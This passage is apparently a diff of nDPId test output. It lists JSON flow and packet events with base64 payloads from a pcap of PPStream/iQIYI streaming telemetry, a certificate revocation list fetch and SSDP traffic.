+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7560000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg=="} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +01506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"thread_ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZXJpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\/kkVyVAYQTfM+gAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNzIwNTEmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUU
gOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1467353179045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353179045,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6EAAAER3+LAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\/kkWWlAYQRLiXwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpd
mUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180357,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJglAAIAGxEDAqHMIymwO7MVGAFChhpBHZLD+y1AYQTfUEAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3
dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\/kkWWlAYQRLiXwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAt
QWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180357,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJglAAIAGxEDAqHMIymwO7MVGAFChhpBHZLD+y1AYQTfUEAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxh